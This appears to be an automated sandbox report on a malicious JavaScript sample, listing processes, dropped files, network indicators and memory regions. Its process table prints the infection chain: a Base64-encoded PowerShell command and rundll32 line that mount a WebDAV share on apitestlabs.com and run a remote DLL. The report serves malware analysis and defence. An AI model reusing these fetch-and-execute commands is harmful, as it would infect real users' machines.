Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2811271181036830236.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i4bzgp0.glw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoxmpbyq.jut.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2811271181036830236.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA1ADEANwAxADMAMAA4ADcANAAyADcAMgA1ADkALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
|
|
|
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\51713087427259.dll,Entry
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://apitestlabs.com:8888/
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://apitestlabs.com:8888/ce
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
apitestlabs.com
|
94.159.113.48
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.48
|
apitestlabs.com
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1E970FB0000
|
heap
|
page read and write
|
||
|
1E971075000
|
heap
|
page read and write
|
||
|
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
20EBBFE000
|
stack
|
page read and write
|
||
|
D9AB6FE000
|
stack
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
A5B1B1E000
|
stack
|
page read and write
|
||
|
1E972E53000
|
heap
|
page read and write
|
||
|
2028A5A0000
|
heap
|
page read and write
|
||
|
1D79B46E000
|
heap
|
page read and write
|
||
|
7FFD9BC10000
|
trusted library allocation
|
page read and write
|
||
|
1E972E40000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1D79D78E000
|
trusted library allocation
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
1E972E38000
|
heap
|
page read and write
|
||
|
1D79B6E0000
|
heap
|
page read and write
|
||
|
20287225000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
20287208000
|
heap
|
page read and write
|
||
|
F96CF1E000
|
stack
|
page read and write
|
||
|
1E970F90000
|
heap
|
page read and write
|
||
|
2802E9CE000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
1D7B55E0000
|
heap
|
page read and write
|
||
|
2802EA15000
|
heap
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
1D7B5457000
|
heap
|
page read and write
|
||
|
2802E9CE000
|
heap
|
page read and write
|
||
|
20EBFB7000
|
stack
|
page read and write
|
||
|
1D79B450000
|
heap
|
page read and write
|
||
|
20EC1BE000
|
stack
|
page read and write
|
||
|
1D79B6C0000
|
trusted library allocation
|
page read and write
|
||
|
1E972E1B000
|
heap
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
1E97116D000
|
heap
|
page read and write
|
||
|
1D79CF40000
|
heap
|
page execute and read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
|
20EBE7F000
|
stack
|
page read and write
|
||
|
20287230000
|
heap
|
page read and write
|
||
|
1E972E11000
|
heap
|
page read and write
|
||
|
1E972E12000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
1E972E55000
|
heap
|
page read and write
|
||
|
1D7B53F0000
|
heap
|
page execute and read and write
|
||
|
20EBAFE000
|
stack
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2028722B000
|
heap
|
page read and write
|
||
|
2802E9A8000
|
heap
|
page read and write
|
||
|
1E972E23000
|
heap
|
page read and write
|
||
|
1D79B49B000
|
heap
|
page read and write
|
||
|
1E97316F000
|
heap
|
page read and write
|
||
|
2028721B000
|
heap
|
page read and write
|
||
|
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
|
2028746B000
|
heap
|
page read and write
|
||
|
2802EA17000
|
heap
|
page read and write
|
||
|
20EBD7E000
|
stack
|
page read and write
|
||
|
1E972E1F000
|
heap
|
page read and write
|
||
|
1E97116B000
|
heap
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
1D79D3D0000
|
trusted library allocation
|
page read and write
|
||
|
F96CF9F000
|
stack
|
page read and write
|
||
|
1E972E18000
|
heap
|
page read and write
|
||
|
1E972E2C000
|
heap
|
page read and write
|
||
|
1D79B491000
|
heap
|
page read and write
|
||
|
D9AB9FE000
|
stack
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
|
20EC2BE000
|
stack
|
page read and write
|
||
|
1D79D7C4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
|
1D79D41D000
|
trusted library allocation
|
page read and write
|
||
|
F96D37E000
|
stack
|
page read and write
|
||
|
1D79B640000
|
heap
|
page read and write
|
||
|
20287236000
|
heap
|
page read and write
|
||
|
1D79D766000
|
trusted library allocation
|
page read and write
|
||
|
1D79B6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
202871D0000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
A5B1A9A000
|
stack
|
page read and write
|
||
|
1E972E1C000
|
heap
|
page read and write
|
||
|
2802EB25000
|
heap
|
page read and write
|
||
|
1D7B56E0000
|
heap
|
page read and write
|
||
|
1E972AC0000
|
heap
|
page read and write
|
||
|
1D79B680000
|
trusted library allocation
|
page read and write
|
||
|
F96D2FC000
|
stack
|
page read and write
|
||
|
202873D0000
|
heap
|
page read and write
|
||
|
1E972E58000
|
heap
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
1D79B6B0000
|
heap
|
page readonly
|
||
|
D9AB4F5000
|
stack
|
page read and write
|
||
|
1E972E34000
|
heap
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
1E972E12000
|
heap
|
page read and write
|
||
|
7FFD9B9B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
20EBCFC000
|
stack
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
|
20287465000
|
heap
|
page read and write
|
||
|
1D79B705000
|
heap
|
page read and write
|
||
|
20EBDFE000
|
stack
|
page read and write
|
||
|
1D7B56C0000
|
heap
|
page execute and read and write
|
||
|
2028A693000
|
heap
|
page read and write
|
||
|
1E973169000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
1E972E40000
|
heap
|
page read and write
|
||
|
2802E9CC000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
20287200000
|
heap
|
page read and write
|
||
|
1D7B5722000
|
heap
|
page read and write
|
||
|
2802EA05000
|
heap
|
page read and write
|
||
|
1D79B400000
|
heap
|
page read and write
|
||
|
1E9736FF000
|
heap
|
page read and write
|
||
|
20EBB7E000
|
stack
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
7DF4D5330000
|
trusted library allocation
|
page execute and read and write
|
||
|
20287225000
|
heap
|
page read and write
|
||
|
1D79D2E1000
|
trusted library allocation
|
page read and write
|
||
|
2802EA00000
|
heap
|
page read and write
|
||
|
2028720F000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
|
2802EB20000
|
heap
|
page read and write
|
||
|
F96CE9A000
|
stack
|
page read and write
|
||
|
20287241000
|
heap
|
page read and write
|
||
|
2802E9E5000
|
heap
|
page read and write
|
||
|
1D79D2C1000
|
trusted library allocation
|
page read and write
|
||
|
1D79B410000
|
heap
|
page read and write
|
||
|
1D79D2DB000
|
trusted library allocation
|
page read and write
|
||
|
2802EA15000
|
heap
|
page read and write
|
||
|
1E972E56000
|
heap
|
page read and write
|
||
|
1E972E5F000
|
heap
|
page read and write
|
||
|
2802E970000
|
remote allocation
|
page read and write
|
||
|
1D7B54AC000
|
heap
|
page read and write
|
||
|
1D7B56F0000
|
heap
|
page read and write
|
||
|
2802E9DB000
|
heap
|
page read and write
|
||
|
1E972E53000
|
heap
|
page read and write
|
||
|
20287249000
|
heap
|
page read and write
|
||
|
1E972E5B000
|
heap
|
page read and write
|
||
|
2802E9F8000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
20EC037000
|
stack
|
page read and write
|
||
|
2028722C000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1E9733A2000
|
heap
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
2802E9FE000
|
heap
|
page read and write
|
||
|
1E972E5F000
|
heap
|
page read and write
|
||
|
2802E900000
|
heap
|
page read and write
|
||
|
1D7B56F4000
|
heap
|
page read and write
|
||
|
20EBEF9000
|
stack
|
page read and write
|
||
|
1E972E24000
|
heap
|
page read and write
|
||
|
1D7AD332000
|
trusted library allocation
|
page read and write
|
||
|
2028722B000
|
heap
|
page read and write
|
||
|
1E971160000
|
heap
|
page read and write
|
||
|
1D79B48D000
|
heap
|
page read and write
|
||
|
1E971165000
|
heap
|
page read and write
|
||
|
2802EA04000
|
heap
|
page read and write
|
||
|
D9ABCFE000
|
stack
|
page read and write
|
||
|
1E972E5E000
|
heap
|
page read and write
|
||
|
2028723C000
|
heap
|
page read and write
|
||
|
2028721B000
|
heap
|
page read and write
|
||
|
1D7B550B000
|
heap
|
page read and write
|
||
|
1D79D678000
|
trusted library allocation
|
page read and write
|
||
|
1E972E17000
|
heap
|
page read and write
|
||
|
1D79D78C000
|
trusted library allocation
|
page read and write
|
||
|
20287460000
|
heap
|
page read and write
|
||
|
2802E9D4000
|
heap
|
page read and write
|
||
|
1E972F33000
|
heap
|
page read and write
|
||
|
20EC0BC000
|
stack
|
page read and write
|
||
|
1D79D3CD000
|
trusted library allocation
|
page read and write
|
||
|
1D79D3E1000
|
trusted library allocation
|
page read and write
|
||
|
1D7B5513000
|
heap
|
page read and write
|
||
|
F96D27B000
|
stack
|
page read and write
|
||
|
1D79B700000
|
heap
|
page read and write
|
||
|
2802E970000
|
remote allocation
|
page read and write
|
||
|
20EC13F000
|
stack
|
page read and write
|
||
|
2028AAE0000
|
trusted library allocation
|
page read and write
|
||
|
1D79CF70000
|
heap
|
page read and write
|
||
|
1E972E17000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
2802EA15000
|
heap
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
20EBC7E000
|
stack
|
page read and write
|
||
|
2802E920000
|
heap
|
page read and write
|
||
|
2802EA0B000
|
heap
|
page read and write
|
||
|
D9ABBFE000
|
stack
|
page read and write
|
||
|
1E972E5C000
|
heap
|
page read and write
|
||
|
20287218000
|
heap
|
page read and write
|
||
|
1E970FF0000
|
heap
|
page read and write
|
||
|
2802EA0B000
|
heap
|
page read and write
|
||
|
1E972E62000
|
heap
|
page read and write
|
||
|
1E972E48000
|
heap
|
page read and write
|
||
|
D9AB5FE000
|
stack
|
page read and write
|
||
|
2802E9D0000
|
heap
|
page read and write
|
||
|
1E97116D000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
|
20EC23E000
|
stack
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
20287220000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E97116D000
|
heap
|
page read and write
|
||
|
1D79D35B000
|
trusted library allocation
|
page read and write
|
||
|
A5B1B9E000
|
stack
|
page read and write
|
||
|
20288D50000
|
heap
|
page read and write
|
||
|
1E972E2F000
|
heap
|
page read and write
|
||
|
1E972E2C000
|
heap
|
page read and write
|
||
|
1D79B430000
|
heap
|
page read and write
|
||
|
1D7B54AA000
|
heap
|
page read and write
|
||
|
2802E9F8000
|
heap
|
page read and write
|
||
|
1E972E3C000
|
heap
|
page read and write
|
||
|
D9ABAFE000
|
stack
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
|
1D7AD2C1000
|
trusted library allocation
|
page read and write
|
||
|
2802E9E5000
|
heap
|
page read and write
|
||
|
2802E9CC000
|
heap
|
page read and write
|
||
|
2028723C000
|
heap
|
page read and write
|
||
|
2802E820000
|
heap
|
page read and write
|
||
|
1E972E28000
|
heap
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
20EC33B000
|
stack
|
page read and write
|
||
|
1E972E10000
|
heap
|
page read and write
|
||
|
20EBF3E000
|
stack
|
page read and write
|
||
|
1D7AD2D0000
|
trusted library allocation
|
page read and write
|
||
|
20287221000
|
heap
|
page read and write
|
||
|
D9AB8FE000
|
stack
|
page read and write
|
||
|
1D79D417000
|
trusted library allocation
|
page read and write
|
||
|
1D7B5489000
|
heap
|
page read and write
|
||
|
1D79D3D3000
|
trusted library allocation
|
page read and write
|
||
|
1D79D32B000
|
trusted library allocation
|
page read and write
|
||
|
1E972E4B000
|
heap
|
page read and write
|
||
|
1D79B4AD000
|
heap
|
page read and write
|
||
|
1D7B554C000
|
heap
|
page read and write
|
||
|
1E970EB0000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
1E972E27000
|
heap
|
page read and write
|
||
|
1E972E37000
|
heap
|
page read and write
|
||
|
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D7B5537000
|
heap
|
page read and write
|
||
|
1E972E26000
|
heap
|
page read and write
|
||
|
1D7B553B000
|
heap
|
page read and write
|
||
|
D9ABEFB000
|
stack
|
page read and write
|
||
|
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
|
1D79B52C000
|
heap
|
page read and write
|
||
|
1E9733A0000
|
heap
|
page read and write
|
||
|
1E97116B000
|
heap
|
page read and write
|
||
|
2028A690000
|
heap
|
page read and write
|
||
|
1D7B547C000
|
heap
|
page read and write
|
||
|
1D7B53F7000
|
heap
|
page execute and read and write
|
||
|
1E972E53000
|
heap
|
page read and write
|
||
|
2802E9A0000
|
heap
|
page read and write
|
||
|
202871E0000
|
heap
|
page read and write
|
||
|
1D7B5450000
|
heap
|
page read and write
|
||
|
1E972E14000
|
heap
|
page read and write
|
||
|
1D7B59F0000
|
heap
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E972E48000
|
heap
|
page read and write
|
||
|
1D7B5511000
|
heap
|
page read and write
|
||
|
2802EA0B000
|
heap
|
page read and write
|
||
|
1D79CF75000
|
heap
|
page read and write
|
||
|
1E972E20000
|
heap
|
page read and write
|
||
|
20EBA73000
|
stack
|
page read and write
|
||
|
1D79B4D5000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
2802E9D0000
|
heap
|
page read and write
|
||
|
2802E970000
|
remote allocation
|
page read and write
|
There are 268 hidden memdumps, click here to show them.